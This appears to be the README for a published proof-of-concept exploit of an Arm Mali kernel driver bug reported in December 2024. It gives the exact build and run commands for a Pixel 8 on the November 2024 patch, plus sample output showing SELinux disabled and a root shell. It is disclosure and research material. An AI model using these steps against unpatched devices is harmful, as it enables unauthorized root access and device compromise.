The write up can be found here. This is a bug in the Arm Mali kernel driver that I reported in December 2024. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.

The exploit is tested on the Google Pixel 8 with the November 2024 patch (AP3A.241105.007). It needs to be compiled with OpenCL and linked with the OpenCL library libGLES_mali.so. The library can be found in a Pixel 8 device in vendor/lib64/egl/libGLES_mali.so and the OpenCL header files can be found in the KhronosGroup's OpenCL-headers repository. The specific header that I used was the v2023.04.17 version, although other versions should also work. For reference, I used the following command to compile with clang in ndk-26:

android-ndk-r26b/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android34-clang -DSHELL -DCL_TARGET_OPENCL_VERSION=300 -I. -L. mali_userio.c mem_read_write.c mempool_utils.c -lGLES_mali -o mali_userio

The exploit needs to be linked to libGLES_mali.so. This can be done by setting the LD_LIBRARY_PATH to /vendor/lib64/egl. The exploit rarely fails and even if it does, it does not normally corrupt or crash the system. So in case it fails, it can be rerun. If successful, it should disable SELinux and gain root.

shiba:/data/local/tmp $ LD_LIBRARY_PATH=/vendor/lib64/egl ./mali_userio                                     
gpu_addr 5ffff94000
group_handle 1 cookie 30000
group_handle 1 cookie 30000
found entry 4000093deaf443 at 384 in page 0
overwrite addr : 5ffff00c60 c60
overwrite addr : 5fffb00c60 c60
overwrite addr : 5ffff00f40 f40
overwrite addr : 5fffb00f40 f40
run enforce
result 50
clean up
shiba:/ #

To test it with MTE enabled, follow these instructions to enable kernel MTE.